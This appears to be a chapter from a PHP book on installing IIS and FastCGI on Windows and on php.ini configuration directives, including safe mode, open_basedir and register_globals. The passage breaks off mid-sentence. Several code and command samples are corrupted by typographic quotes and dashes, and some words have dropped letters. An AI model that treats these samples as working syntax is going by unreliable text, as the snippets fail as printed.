Installing IIS and PHP on Windows
Microsoft Windows remains the operating system of choice even among most open source–minded developers, largely due to reasons of convenience; after all, as the dominant desktop operating system, it makes sense that most would prefer to continue using this familiar environment. Yet for reasons of both stability and performance, deploying PHP-driven Web sites on Linux running an Apache Web server has historically been the best choice.
    But this presents a problem if you’d like to develop and even deploy your PHPdriven Web site on a Windows server running the Microsoft IIS Web server. Microsoft, in collaboration with PHP products and services provider Zend Technologies Ltd., is seeking to eliminate this inconvenience through a new IIS component called FastCGI. FastCGI greatly improves the way IIS interacts with certain third-party applications that weren’t written with IIS in mind, including PHP (versions 5.X and newer are supported). Though FastCGI wasn’t intended for use within production environments at the time of publication, it is ready for testing and development purposes. In this section you’ll learn how to configure PHP to run in conjunction with IIS.
Installing IIS and PHP
To begin, download PHP as explained in the earlier section “Downloading PHP.” Be sure to choose the Windows zip package distribution as described in that section.
  Extract the zip file to C:\php. Believe it or not, this is all that’s required in regard to installing PHP.
    Next you’ll need to install IIS. In order to take advantage of FastCGI, you’ll need to install IIS version 5.1 or greater. IIS 5.1 is available for Windows 2000 Professional, Windows 2000 Server, and Windows XP Professional, whereas IIS 6 is available for Windows 2003 Server. You can verify whether IIS is installed on these operating systems by navigating to Start ➤ Run and executing inetmgr at the prompt. If the IIS manager loads, it’s installed and you can proceed to the next section, “Configuring FastCGI to Manage PHP Processes.” If it is not installed, insert the Windows XP Professional CD into your CD-ROM drive and navigate to Start ➤ Control Panel ➤ Add/Remove Programs, and select Add/Remove Windows Components. From here, check the box next to Internet Information Services (IIS) and click Next, then click OK.

Note: It’s not possible to download any version of IIS; they are bundled solely with the corresponding version of Windows, therefore you will need the Windows installation disk if IIS isn’t already installed on your computer. Also, IIS is not available nor installable on Windows 98, Windows ME, or Windows XP Home Edition.

    IIS 7 is bundled with both Windows Vista and Windows Server “Longhorn”; however, it may not be installed on your machine. You can verify whether IIS is installed on these operating systems by navigating to Start ➤ Run and executing inetmgr at the prompt. If the IIS manager loads, it’s installed, and you can proceed to the next section, “Configuring FastCGI to Manage PHP Processes.” Otherwise, install IIS 7 by navigating to Start ➤ Settings ➤ Control Panel ➤ Programs and Features and clicking the Turn Windows Features On and Off link appearing to the right of the window. As shown in Figure 2-1, a new window will appear containing a list of features you’re free to enable and disable at will, including IIS. Enable IIS by clicking the checkbox next to it.
    You’ll also want to enable FastCGI by clicking the checkbox next to CGI. Once both of these checkboxes have been enabled, click the OK button.
    Once the installation process completes, you’ll need to restart the operating system for the changes to take effect.

      Figure 2-1. Enabling IIS on Vista
    Configuring FastCGI to Manage PHP Processes Next you’ll need to configure FastCGI to handle PHP-specific requests. This is done by navigating to the IIS Manager (Start ➤ Run, then enter inetmgr), clicking Handler Mappings, clicking Add Module Mapping, and then entering the mapping as shown
in Figure 2-2.
    PHP and IIS are now properly installed and configured on your machine. Proceed to the next section to test your installation.

     Figure 2-2. Confirming the FastCGI Handler Mapping is installed
Testing Your Installation
The best way to verify your PHP installation is by attempting to execute a PHP script.
   Open a text editor and add the following lines to a new file:
    <?php
     phpinfo();
    ?>
   If you’re running Apache, save the file within the htdocs directory as phpinfo.php. If you’re running IIS, save the file within C:\inetpub\wwwroot\.
    Now open a browser and access this file by entering the following URL: http:// localhost/phpinfo.php.
    If all goes well, you should see output similar to that shown in Figure 2-3. If you’re attempting to run this script on a Web hosting provider’s server, and you receive an error message stating phpinfo() has been disabled for security reasons, you’ll need to tryexecuting another script. Try executing this one instead, which should produce some simple output:
    <?php
     echo “A simple but effective PHP test!”;
    ?>

     Figure 2-3. Output from PHP’s phpinfo() function
   If you encountered no noticeable errors during the build process but you are not seeing the appropriate output, it may be due to one or more of the following reasons:

     • Changes made to Apache’s configuration file do not take effect until it has been restarted. Therefore, be sure to restart Apache after adding the necessary PHPspecific lines to the httpd.conf file.
     • When you modify the Apache configuration file, you may accidentally introduce an invalid character, causing Apache to fail upon an attempt to restart. If
Apache will not start, go back and review your changes.
     • Verify that the file ends in the PHP-specific extension as specified in the httpd.conf file. For example, if you’ve defined only .php as the recognizable
extension, don’t try to embed PHP code in an .html file.
     • Make sure that you’ve delimited the PHP code within the file. Neglecting to do this will cause the code to output to the browser.
     • You’ve created a file named index.php and are trying unsuccessfully to call it as you would a default directory index. Remember that by default, Apache only
recognizes index.html in this fashion. Therefore, you need to add index.php to Apache’s DirectoryIndex directive.
     • If you’re running IIS, make sure the appropriate mapping is available, as shown in Figure 2-2. If not, something went awry during the FastCGI installation process.
Try removing that mapping and installing FastCGI anew.

Configuring PHP

   Although the base PHP installation is sufficient for most beginning users, chances are you’ll soon want to make adjustments to the default configuration settings and possibly experiment with some of the third-party extensions that are not built into the distribution by default. In this section you’ll learn all about how to tweak PHP’s behavior and features to your specific needs.

Configuring PHP at Build Time on Linux Building

    PHP as described earlier in the chapter is sufficient for getting started; however, you should keep in mind many other build-time options are at your disposal. You can view a complete list of configuration flags (there are more than 200) by executing the following:

     %>./configure –help
    To make adjustments to the build process, you just need to add one or more of these arguments to PHP’s configure command, including a value assignment if necessary.
For example, suppose you want to enable PHP’s FTP functionality, a feature not enabled by default. Just modify the configuration step of the PHP build process like so:
     %>./configure –with-apxs2=/usr/local/apache2/bin/apxs –enable-ftp
   As another example, suppose you want to enable PHP’s Java extension. Just reconfigure PHP like so:
     %>./configure –with-apxs2=/usr/local/apache2/bin/apxs \
>–enable-java=[JDK-INSTALL-DIR]
     One common point of confusion among beginners is to assume that simply including additional flags will automatically make this functionality available via PHP. This is not necessarily the case. Keep in mind that you also need to install the software that is ultimately responsible for enabling the extension support. In the case of the Java example, you need the Java Development Kit (JDK).

Customizing the Windows Build

A total of 45 extensions are bundled with PHP 5.1 and 5.2, a number that was pared to 35 extensions with the current alpha version of PHP 6. However, to actually use any of these extensions, you need to uncomment the appropriate line within the php.ini file. For example, if you’d like to enable PHP’s XML-RPC extension, you need to make a few minor adjustments to your php.ini file:
    1. Open the php.ini file and locate the extension_dir directive and assign it C:\php\ext\. If you installed PHP in another directory, modify this path
accordingly.
    2. Locate the line ;extension=php_xmlrpc.dll. Uncomment this line by removing the preceding semicolon. Save and close the file.
    3. Restart the Web server and the extension is ready for use from within PHP. Keep in mind that some extensions have additional configuration directives that may be found later in the php.ini file.

    When enabling these extensions, you may occasionally need to install other software. See the PHP documentation for more information about each respective
extension.

Run-Time Configuration
    It’s possible to change PHP’s behavior at run time on both Windows and Linux through the php.ini file. This file contains a myriad of configuration directives that collectively control the behavior of each product. The remainder of this chapter focuses on PHP’s most commonly used configuration directives, introducing the
purpose, scope, and default value of each.

Managing PHP’s Configuration Directives
Before you delve into the specifics of each directive, this section demonstrates the various ways in which these directives can be manipulated, including through the php.ini file, Apache’s httpd.conf and .htaccess files, and directly through a PHP script.

The php.ini File
    The PHP distribution comes with two configuration templates, php.ini-dist and php.ini-recommended. You’ll want to rename one of these files to php.ini and place it in the location specified by the PHPIniDir directive found in Apache’s httpd.conf file. It’s suggested that you use the latter because many of the parameters found within it are already assigned their suggested settings. Taking this advice will likely save you a good deal of initial time and effort securing and tweaking your installation because there are well over 200 distinct configuration parameters in this file. Although the default values go a long way toward helping you to quickly deploy PHP, you’ll probably want to make additional adjustments to PHP’s behavior, so you’ll need to learn a bit more about
php.ini and its many configuration parameters. The upcoming section “PHP’s Configuration Directives” presents a comprehensive introduction to many of these parameters, explaining the purpose, scope, and range of each.
    The php.ini file is PHP’s global configuration file, much like httpd.conf is to Apache. This file addresses 12 different aspects of PHP’s behavior:
    • Language Options
    • Safe Mode
    • Syntax Highlighting
    • Miscellaneous
    • Resource Limits
    • Error Handling and Logging
    • Data Handling
    • Paths and Directories
    • File Uploads
    • Fopen Wrappers
    • Dynamic Extensions
    • Module Settings
The section “PHP’s Configuration Directives” that follows will introduce many of the directives found in the php.ini file. Later chapters will introduce module-specific directives as appropriate.
   Before you are introduced to them, however, take a moment to review the php.ini file’s general syntactical characteristics. The php.ini file is a simple text file, consisting solely of comments and the directives and their corresponding values. Here’s a sample snippet from the file:
    ;
    ; Allow the <? tag
    ;
  short_open_tag = Off
Lines beginning with a semicolon are comments; the parameter short_open_tag is assigned the value Off.

    Exactly when changes take effect depends on how you install PHP. If PHP is installed as a CGI binary, the php.ini file is reread every time PHP is invoked, thus
making changes instantaneous. If PHP is installed as an Apache module, php.ini is only read in once, when the Apache daemon is first started. Therefore, if PHP is
    installed in the latter fashion, you must restart Apache before any of the changes take effect.
    The Apache httpd.conf and .htaccess Files When PHP is running as an Apache module, you can modify many of the directives through either the httpd.conf file or the .htaccess file. This is accomplished by prefixing directive/value assignment with one of the following keywords:
    • php_value: Sets the value of the specified directive.
    • php_flag: Sets the value of the specified Boolean directive.
    • php_admin_value: Sets the value of the specified directive. This differs from php_value in that it cannot be used within an .htaccess file and cannot be overridden within virtual hosts or .htaccess.
    • php_admin_flag: Sets the value of the specified directive. This differs from php_value in that it cannot be used within an .htaccess file and cannot be
overridden within virtual hosts or .htaccess.
For example, to disable the short tags directive and prevent others from overriding it, add the following line to your httpd.conf file:
php_admin_flag short_open_tag Off
Within the Executing Script
The third, and most localized, means for manipulating PHP’s configuration variables is via the ini_set() function. For example, suppose you want to modify PHP’s
maximum execution time for a given script. Just embed the following command into the top of the script:
ini_set(”max_execution_time”,”60″);

Configuration Directive Scope
Can configuration directives be modified anywhere? The answer is no, for a variety of reasons, mostly security related. Each directive is assigned a scope, and the directive can be modified only within that scope. In total, there are four scopes:
    • PHP_INI_PERDIR: Directive can be modified within the php.ini, httpd.conf, or .htaccess files
    • PHP_INI_SYSTEM: Directive can be modified within the php.ini and httpd.conf files
    • PHP_INI_USER: Directive can be modified within user scripts
    • PHP_INI_ALL: Directive can be modified anywhere

PHP’s Configuration Directives

    The following sections introduce many of PHP’s core configuration directives. In addition to a general definition, each section includes the configuration directive’s scope and default value. Because you’ll probably spend the majority of your time working with these variables from within the php.ini file, the directives are introduced as they appear in this file.
    Note that the directives introduced in this section are largely relevant solely to PHP’s general behavior; directives pertinent to extensions, or to topics in which
considerable attention is given later in the book, are not introduced in this section but rather are introduced in the appropriate chapter.

Language Options
The directives located in this section determine some of the language’s most basic behavior. You’ll definitely want to take a few moments to become acquainted with these configuration possibilities.
   engine = On | Off
Scope: PHP_INI_ALL; Default value: On This parameter is responsible for determining whether the PHP engine is available. Turning it off prevents you from using PHP at all. Obviously, you should leave this enabled if you plan to use PHP.

Note: The zend.ze1_compatibility_mode directive never worked as intended and was removed in PHP 6.

short_open_tag = On | Off
Scope: PHP_INI_ALL; Default value: On
PHP script components are enclosed within escape syntax. There are four different escape formats, the shortest of which is known as short open tags, which looks like this:
        <?
         echo “Some PHP statement”;
        ?>
You may recognize that this syntax is shared with XML, which could cause issues in certain environments. Thus, a means for disabling this particular format has been provided. When short_open_tag is enabled (On), short tags are allowed; when disabled (Off), they are not.
asp_tags = On | Off
Scope: PHP_INI_ALL; Default value: Off
PHP supports ASP-style script delimiters, which look like this:
        <%
         echo “Some PHP statement”;
        %>
If you’re coming from an ASP background and prefer to continue using this delimiter syntax, you can do so by enabling this tag.

precision = integer
Scope: PHP_INI_ALL; Default value: 12
PHP supports a wide variety of datatypes, including floating-point numbers. The precision parameter specifies the number of significant digits displayed in a floatingpoint number representation. Note that this value is set to 14 digits on Win32 systems and to 12 digits on Linux.
y2k_compliance = On | Off
Scope: PHP_INI_ALL; Default value: Off
Who can forget the Y2K scare of just a few years ago? Superhuman efforts were undertaken to eliminate the problems posed by non-Y2K-compliant software, and although it’s very unlikely, some users may be using wildly outdated, noncompliant browsers. If for some bizarre reason you’re sure that a number of your site’s users fall into this group, then disable the y2k_compliance parameter; otherwise, it should be enabled.
output_buffering = On | Off | integer
Scope: PHP_INI_SYSTEM; Default value: Off
Anybody with even minimal PHP experience is likely quite familiar with the following two messages:

   These messages occur when a script attempts to modify a header after it has already been sent back to the requesting user. Most commonly they are the result of the programmer attempting to send a cookie to the user after some output has already been sent back to the browser, which is impossible to accomplish because the header (not seen by the user, but used by the browser) will always precede that output. PHP version 4.0 offered a solution to this annoying problem by introducing the concept of output buffering. When enabled, output buffering tells PHP to send all output at once, after the script has been completed. This way, any subsequent changes to the header can be made throughout the script because it hasn’t yet been sent. Enabling the output_buffering directive turns output buffering on. Alternatively, you can limit the size of the output buffer (thereby implicitly enabling output buffering) by setting it to the maximum number of bytes you’d like this buffer to contain.
    If you do not plan to use output buffering, you should disable this directive because it will hinder performance slightly. Of course, the easiest solution to the header issue is simply to pass the information before any other content whenever possible.
output_handler = string
Scope: PHP_INI_ALL; Default value: NULL
This interesting directive tells PHP to pass all output through a function before returning it to the requesting user. For example, suppose you want to compress all output before returning it to the browser, a feature supported by all mainstream HTTP/1.1-compliant browsers. You can assign output_handler like so:
output_handler = “ob_gzhandler”
ob_gzhandler() is PHP’s compression-handler function, located in PHP’s output control library. Keep in mind that you cannot simultaneously set  utput_handler to ob_gzhandler() and enable zlib.output_compression (discussed next).
zlib.output_compression = On | Off | integer
Scope: PHP_INI_SYSTEM; Default value: Off
Compressing output before it is returned to the browser can save bandwidth and time. This HTTP/1.1 feature is supported by most modern browsers and can be safely used in most applications. You enable automatic output compression by setting zlib.output_compression to On. In addition, you can simultaneously enable output compression and set a compression buffer size (in bytes) by assigning zlib.output_ compression an integer value.
zlib.output_handler = string
Scope: PHP_INI_SYSTEM; Default value: NULL
The zlib.output_handler specifies a particular compression library if the zlib library is not available.

implicit_flush = On | Off
Scope: PHP_INI_SYSTEM; Default value: Off
Enabling implicit_flush results in automatically clearing, or flushing, the output buffer of its contents after each call to print() or echo(), and completing each embedded HTML block. This might be useful in an instance where the server requires an unusually long period of time to compile results or perform certain calculations. In such cases, you can use this feature to output status updates to the user rather than just wait until the server completes the procedure.
unserialize_callback_func = string
Scope: PHP_INI_ALL; Default value: NULL
This directive allows you to control the response of the unserializer when a request is made to instantiate an undefined class. For most users, this directive is irrelevant because PHP already outputs a warning in such instances if PHP’s error reporting is tuned to the appropriate level.
serialize_precision = integer
Scope: PHP_INI_ALL; Default value: 100
The serialize_precision directive determines the number of digits stored after the floating point when doubles and floats are serialized. Setting this to an appropriate value ensures that the precision is not potentially lost when the numbers are later unserialized.
allow_call_time_pass_reference = On | Off
Scope: PHP_INI_SYSTEM; Default value: On
Function arguments can be passed in two ways: by value and by reference. Exactly how each argument is passed to a function at function call time can be specified in the function definition, which is the recommended means for doing so. However, you can force all arguments to be passed by reference at function call time by enabling allow_call_time_pass_reference.
    The discussion of PHP functions in Chapter 4 addresses how functional arguments can be passed both by value and by reference, and the implications of doing so.
Safe Mode
When you deploy PHP in a multiuser environment, such as that found on an ISP’s shared server, you might want to limit its functionality. As you might imagine, offering all users full reign over all PHP’s functions could open up the possibility for exploiting or damaging server resources and files. As a safeguard for using PHP on shared servers, PHP can be run in a restricted, or safe, mode.
    Enabling safe mode will disable quite a few functions and various features deemed to be potentially insecure and thus possibly damaging if they are misused within a local script. A small sampling of these disabled functions and features includes parse_ini_file(), chmod(), chown(), chgrp(), exec(), system(), and backtick operators. Enabling safe mode also ensures that the owner of the executing script matches the owner of any file or directory targeted by that script. However, this latter restriction in particular can have unexpected and inconvenient effects because files can often be uploaded and otherwise generated by other user IDs.
In addition, enabling safe mode opens up the possibility for activating a number of other restrictions via other PHP configuration directives, each of which is introduced in this section.

safe_mode = On | Off
Scope: PHP_INI_SYSTEM; Default value: Off
Enabling the safe_mode directive results in PHP being run under the aforementioned constraints.
safe_mode_gid = On | Off
Scope: PHP_INI_SYSTEM; Default value: Off
When safe mode is enabled, an enabled safe_mode_gid enforces a GID (group ID) check when opening files. When safe_mode_gid is disabled, a more restrictive UID (user ID) check is enforced.
safe_mode_include_dir = string
Scope: PHP_INI_SYSTEM; Default value: NULL
The safe_mode_include_dir provides a safe haven from the UID/GID checks enforced when safe_mode and potentially safe_mode_gid are enabled. UID/GID
checks are ignored when files are opened from the assigned directory.

safe_mode_exec_dir = string
Scope: PHP_INI_SYSTEM; Default value: NULL
    When safe mode is enabled, the safe_mode_exec_dir parameter restricts execution of executables via the exec() function to the assigned directory. For example, if you want to restrict execution to functions found in /usr/local/bin, you use this directive:
safe_mode_exec_dir = “/usr/local/bin”
safe_mode_allowed_env_vars = string
Scope: PHP_INI_SYSTEM; Default value: PHP_
    When safe mode is enabled, you can restrict which operating system–level environment variables users can modify through PHP scripts with the safe_mode_allowed_env_vars directive. For example, setting this directive as follows limits modification to only those variables with a PHP_ prefix:
safe_mode_allowed_env_vars = “PHP_”
Keep in mind that leaving this directive blank means that the user can modify any environment variable.
safe_mode_protected_env_vars = string
Scope: PHP_INI_SYSTEM; Default value: LD_LIBRARY_PATH
    The safe_mode_protected_env_vars directive offers a means for explicitly preventing certain environment variables from being modified. For example, if you want to prevent the user from modifying the PATH and LD_LIBRARY_PATH variables, you use this directive:
safe_mode_protected_env_vars = “PATH, LD_LIBRARY_PATH”
open_basedir = string
Scope: PHP_INI_SYSTEM; Default value: NULL
    Much like Apache’s DocumentRoot directive, PHP’s open_basedir directive can establish a base directory to which all file operations will be restricted. This prevents users from entering otherwise restricted areas of the server. For example, suppose all Web material is located within the directory /home/www. To prevent users from viewing and potentially manipulating files like /etc/passwd via a few simple PHP commands, consider setting open_basedir like this:
open_basedir = “/home/www/”

Note that the influence exercised by this directive is not dependent upon the safe_mode directive.
disable_functions = string
Scope: PHP_INI_SYSTEM; Default value: NULL
    In certain environments, you may want to completely disallow the use of certain default functions, such as exec() and system(). Such functions can be disabled by assigning them to the disable_functions parameter, like this:
disable_functions = “exec, system”;
Note that the influence exercised by this directive is not dependent upon the safe_mode directive.
disable_classes = string
Scope: PHP_INI_SYSTEM; Default value: NULL
    Given the capabilities offered by PHP’s embrace of the object-oriented paradigm, it likely won’t be too long before you’re using large sets of class libraries. There may be certain classes found within these libraries that you’d rather not make available, however. You can prevent the use of these classes via the disable_classes directive. For example, if you want to disable two particular classes, named vector and graph, you use the following:
disable_classes = “vector, graph”
Note that the influence exercised by this directive is not dependent upon the safe_mode directive.
ignore_user_abort = Off | On
Scope: PHP_INI_ALL; Default value: On
    How many times have you browsed to a particular page only to exit or close the browser before the page completely loads? Often such behavior is harmless. However, what if the server is in the midst of updating important user profile information, or completing a commercial transaction? Enabling ignore_user_abort causes the server to ignore session termination caused by a user- or browser-initiated interruption.
Syntax Highlighting
PHP can display and highlight source code. You can enable this feature either by assigning the PHP script the extension .phps (this is the default extension and, as you’ll soon learn, can be modified) or via the show_source() or highlight_file() function. To use the .phps extension, you need to add the following line to httpd.conf:
AddType application/x-httpd-php-source .phps
    You can control the color of strings, comments, keywords, the background, default text, and HTML components of the highlighted source through the following six directives.
    Each can be assigned an RGB, hexadecimal, or keyword representation of each color. For example, the color we commonly refer to as black can be represented as rgb(0,0,0), #000000, or black, respectively.
   highlight.string = string
    Scope: PHP_INI_ALL; Default value: #DD0000
   highlight.comment = string
    Scope: PHP_INI_ALL; Default value: #FF9900
   highlight.keyword = string
    Scope: PHP_INI_ALL; Default value: #007700
   highlight.bg = string
    Scope: PHP_INI_ALL; Default value: #FFFFFF
   highlight.default = string
    Scope: PHP_INI_ALL; Default value: #0000BB
   highlight.html = string
    Scope: PHP_INI_ALL; Default value: #000000

Miscellaneous
The Miscellaneous category consists of a single directive, expose_php.

expose_php = On | Off
Scope: PHP_INI_SYSTEM; Default value: On
Each scrap of information that a potential attacker can gather about a Web server increases the chances that he will successfully compromise it. One simple way to obtain key information about server characteristics is via the server signature. For example, Apache will broadcast the following information within each response header by default:
   Apache/2.2.0 (Unix) PHP/6.0.0 PHP/6.0.0-dev Server at www.example.com Port 80
Disabling expose_php prevents the Web server signature (if enabled) from broadcasting the fact that PHP is installed. Although you need to take other steps to ensure sufficient server protection, obscuring server properties such as this one is nonetheless heartily recommended.

Resource Limits
Although PHP’s resource-management capabilities were improved in version 5, you must still be careful to ensure that scripts do not monopolize server resources as a result of either programmer- or user-initiated actions. Three particular areas where such overconsumption is prevalent are script execution time, script input processing time, and memory. Each can be controlled via the following three directives.
   max_execution_time = integer
    Scope: PHP_INI_ALL; Default value: 30
The max_execution_time parameter places an upper limit on the amount of time, in seconds, that a PHP script can execute. Setting this parameter to 0 disables any maximum limit. Note that any time consumed by an external program executed by PHP commands, such as exec() and system(), does not count toward this limit.
   max_input_time = integer
    Scope: PHP_INI_ALL; Default value: 60
The max_input_time parameter places a limit on the amount of time, in seconds, that a PHP script devotes to parsing request data. This parameter is particularly important when you upload large files using PHP’s file upload feature, which is discussed in Chapter 15.

   memory_limit = integerM
    Scope: PHP_INI_ALL; Default value: 8M
The memory_limit parameter determines the maximum amount of memory, in megabytes, that can be allocated to a PHP script.

Data Handling
The parameters introduced in this section affect the way that PHP handles external variables— that is, variables passed into the script via some outside source. GET, POST,cookies, the operating system, and the server are all possible candidates for providing external data. Other parameters located in this section determine PHP’s default character set, PHP’s default MIME type, and whether external files will be automatically prepended or appended to PHP’s returned output.

   arg_separator.output = string
    Scope: PHP_INI_ALL; Default value: &amp;
PHP is capable of automatically generating URLs and uses the standard ampersand (&) to separate input variables. However, if you need to override this convention, you can do so by using the arg_separator.output directive.

   arg_separator.input = string
    Scope: PHP_INI_ALL; Default value: ;&
The ampersand (&) is the standard character used to separate input variables passed in via the POST or GET methods. Although unlikely, should you need to
override this convention within your PHP applications, you can do so by using the arg_separator.input directive.

   variables_order = string
    Scope: PHP_INI_ALL; Default value: EGPCS
The variables_order directive determines the order in which the ENVIRONMENT, GET, POST, COOKIE, and SERVER variables are parsed. While seemingly irrelevant, if register_globals is enabled (not recommended), the ordering of these values could result in unexpected results due to later variables overwriting those parsed earlier in the process.

   register_globals = On | Off
    Scope: PHP_INI_SYSTEM; Default value: Off
If you have used a pre-4.0 version of PHP, the mere mention of this directive is enough to evoke gnashing of the teeth and pulling of the hair. To eliminate the problems, this directive was disabled by default in version 4.2.0 , but at the cost of forcing many long-time PHP users to entirely rethink (and in some cases rewrite) their Web application development methodology. This change, although done at a cost of considerable confusion, ultimately serves the best interests of developers in terms of greater application security. If you’re new to all of this, what’s the big deal?

    Historically, all external variables were automatically registered in the global scope. That is, any incoming variable of the types COOKIE, ENVIRONMENT, GET, POST, and SERVER were made available globally. Because they were available globally, they were also globally modifiable. Although this might seem convenient to some people, it also introduced a security deficiency because variables intended to be managed solely by using a cookie could also potentially be modified via the URL. For example, suppose that a session identifier uniquely identifying the user is communicated across pages via a cookie. Nobody but that user should see the data that is ultimately mapped to the user identified by that session identifier. A user could open the cookie, copy the session
identifier, and paste it onto the end of the URL, like this:
http://www.example.com/secretdata.php?sessionid=4×5bh5H793adK
The user could then e-mail this link to some other user. If there are no other security restrictions in place (e.g., IP identification), this second user will be able to see the otherwise confidential data.     Disabling the register_globals directive prevents such behavior from occurring. While these external variables remain in the global scope, each must be referred to in conjunction with its type. For example, the sessionid variable in the previous example would instead be referred to solely as the following:
    $_COOKIE['sessionid']
Any attempt to modify this parameter using any other means (e.g., GET or POST) causes a new variable in the global scope of that    means ($_GET['sessionid'] or
   $_POST['sessionid']).
In Chapter 3, the section on PHP’s superglobal variables offers a thorough introduction to external variables of the COOKIE, NVIRONMENT, GET, POST,and SERVER types. Although disabling register_globals is unequivocally a good idea, it isn’t the only factor you should keep in mind when you secure an application. Chapter 21 offers more information about PHP application security.

Note: The register_globals feature has been a constant source of confusion and securityrelated problems over the years. Accordingly, it is no longer available as of PHP 6.

   register_long_arrays = On | Off
    Scope: PHP_INI_SYSTEM; Default value: On
   This directive determines whether to continue registering the various input arrays (ENVIRONMENT, GET, POST, COOKIE, SYSTEM) using the deprecated syntax, such as HTTP_*_VARS. Disabling this directive is recommended for performance reasons.

Note: The register_long_arrays directive is no longer available as of PHP 6.

   register_argc_argv = On | Off
    Scope: PHP_INI_SYSTEM; Default value: On
  Passing in variable information via the GET method is analogous to passing arguments to an executable. Many languages process such arguments in terms of argc
and argv. argc is the argument count, and argv is an indexed array containing the arguments. If you would like to declare variables $argc and $argv and mimic this functionality, enable register_argc_argv.
   post_max_size = integerM
    Scope: PHP_INI_SYSTEM; Default value: 8M
  Of the two methods for passing data between requests, POST is better equipped to transport large amounts, such as what might be sent via a Web form. However, for both security and performance reasons, you might wish to place an upper ceiling on exactly how much data can be sent via this method to a PHP script; this can be accomplished using post_max_size.

WORKING WITH SINGLE AND DOUBLE QUOTES
   Quotes, both of the single and double variety, have long played a special role in programming. Because they are commonly used both as string delimiters and in written language, you need a way to differentiate between the two in programming, to eliminate confusion. The solution is simple: escape any quote mark not intended to delimit the string. If you don’t do this, unexpected errorscould occur. Consider the following:
     $sentence = “John said, “I love racing cars!”";
   Which quote marks are intended to delimit the string, and which are used to delimit John’s utterance? PHP doesn’t know, unless certain quote marks are escaped, like this:
    $sentence = “John said, \”I love racing cars!\”";
   Escaping nondelimiting quote marks is known as enabling magic quotes. This process could be done either automatically, by enabling the directive magic_quotes_gpc (introduced in this section), or manually, by using the functions addslashes() and stripslashes(). The latter strategy is recommended because it enables you to wield total control over the application, although in those cases where you’re trying to use an application in which the automatic escaping of quotations is expected, you’ll need to enable this behavior accordingly. Three parameters have long determined how PHP behaves in this regard: magic_quotes_
gpc, magic_quotes_runtime, and magic_quotes_sybase. However, because this feature has long been a source of confusion among developers, it’s been  emoved as of PHP 6.

magic_quotes_gpc = On | Off
   Scope: PHP_INI_SYSTEM; Default value: On
This parameter determines whether magic quotes are enabled for data transmitted via the GET, POST, and cookie methodologies. When enabled, all single and
double quotes, backslashes, and null characters are automatically escaped with a backslash.
   magic_quotes_runtime = On | Off
    Scope: PHP_INI_ALL; Default value: Off
Enabling this parameter results in the automatic escaping (using a backslash) of any quote marks located within data returned from an external resource, such as a database or text file.

magic_quotes_sybase = On | Off
   Scope: PHP_INI_ALL; Default value: Off
This parameter is only of interest if magic_quotes_runtime is enabled. If magic_quotes_sybase is enabled, all data returned from an external resource will be escaped using a single quote rather than a backslash. This is useful when the data is being returned from a Sybase database, which employs a rather unorthodox requirement of escaping special characters with a single quote rather than a backslash.
   auto_prepend_file = string
    Scope: PHP_INI_SYSTEM; Default value: NULL
  Creating page header templates or including code libraries before a PHP script is executed is most commonly done using the include() or require() function. You can automate this process and forgo the inclusion of these functions within your scripts by assigning the file name and corresponding path to the auto_prepend_file directive.
   auto_append_file = string
    Scope: PHP_INI_SYSTEM; Default value: NULL
  Automatically inserting footer templates after a PHP script is executed is most commonly done using the include() or require() functions. You can automate this
process and forgo the inclusion of these functions within your scripts by assigning the template file name and corresponding path to the auto_append_file directive.
   default_mimetype = string
    Scope: PHP_INI_ALL; Default value: text/html
   MIME types offer a standard means for classifying file types on the Internet. You can serve any of these file types via PHP applications, the most common of which is text/html. If you’re using PHP in other fashions, however, such as a content generator for WML (Wireless Markup Language) applications, you need to adjust the MIME type accordingly. You can do so by modifying the default_mimetype directive.
   default_charset = string
    Scope: PHP_INI_ALL; Default value: iso-8859-1
  As of version 4.0, PHP outputs a character encoding in the Content-Type header. By default this is set to iso-8859-1, which supports languages such as English,
Spanish, German, Italian, and Portuguese, among others. If your application is geared toward languages such as Japanese, Chinese, or Hebrew, however, the default_charset directive allows you to update this character set setting accordingly.

always_populate_raw_post_data = On | Off
    Scope: PHP_INI_PERDIR; Default value: On
   Enabling the always_populate_raw_post_data directive causes PHP to assign a string consisting of POSTed name/value pairs to the variable $HTTP_RAW_POST_DATA, even if the form variable has no corresponding value. For example, suppose this directive is enabled and you create a form consisting of two text fields, one for the user’s name and another for the user’s e-mail address. In the resulting form action, you execute just one command:
echo $HTTP_RAW_POST_DATA;
    Filling out neither field and clicking the Submit button results in the following output:
    name=&email=
Filling out both fields and clicking the Submit button produces output similar to the following:
     name=sharp&email=xyz@note.com

Paths and Directories
   This section introduces directives that determine PHP’s default path settings. These paths are used for including libraries and extensions, as well as for determining user Web directories and Web document roots.
   include_path = string
    Scope: PHP_INI_ALL; Default value: NULL
The path to which this parameter is set serves as the base path used by functions such as include(), require(), and fopen_with_path(). You can specify multiple directories by separating each with a semicolon, as shown in the following example:
     include_path=”.:/usr/local/include/php;/home/php”
By default, this parameter is set to the path defined by the environment variable PHP_INCLUDE_PATH.

Note that on Windows, backward slashes are used in lieu of forward slashes, and the drive letter prefaces the path:
   include_path=”.;C:\php6\includes”

   doc_root = string
    Scope: PHP_INI_SYSTEM; Default value: NULL
This parameter determines the default from which all PHP scripts will be served. This parameter is used only if it is not empty.
   user_dir = string
    Scope: PHP_INI_SYSTEM; Default value: NULL
  The user_dir directive specifies the absolute directory PHP uses when opening files using the /~username convention. For example, when user_dir is set to /home/users and a user attempts to open the file ~/gilmore/collections/books.txt, PHP knows that the
absolute path is /home/ users/gilmore/collections/books.txt.
   extension_dir = string
    Scope: PHP_INI_SYSTEM; Default value: ./
  The extension_dir directive tells PHP where its loadable extensions (modules) are located. By default, this is set to ./, which means that the loadable extensions are located in the same directory as the executing script. In the Windows environment, if extension_dir is not set, it will default to C:\PHP-INSTALLATION-DIRECTORY\ext\. In the Linux environment, the exact location of this directory depends on several factors, although it’s quite likely that the location will be PHP-INSTALLATION-DIRECTORY/lib/ php/extensions/no-debug-zts-RELEASE-BUILD-DATE/.
   enable_dl = On | Off
    Scope: PHP_INI_SYSTEM; Default value: On
  The enable_dl() function allows a user to load a PHP extension at run time—that is, during a script’s execution.

 Fopen Wrappers
T   his section contains five directives pertinent to the access and manipulation of remote files.

allow_url_fopen = On | Off
   Scope: PHP_INI_ALL; Default value: On
Enabling allow_url_fopen allows PHP to treat remote files almost as if they were local. When enabled, a PHP script can access and modify files residing on remote
servers, if the files have the correct permissions.
   from = string
    Scope: PHP_INI_ALL; Default value: NULL
  The title of the from directive is perhaps misleading in that it actually determines the password, rather than the identity, of the anonymous user used to perform FTP connections. Therefore, if from is set like this
     from = “xyz@note.com”
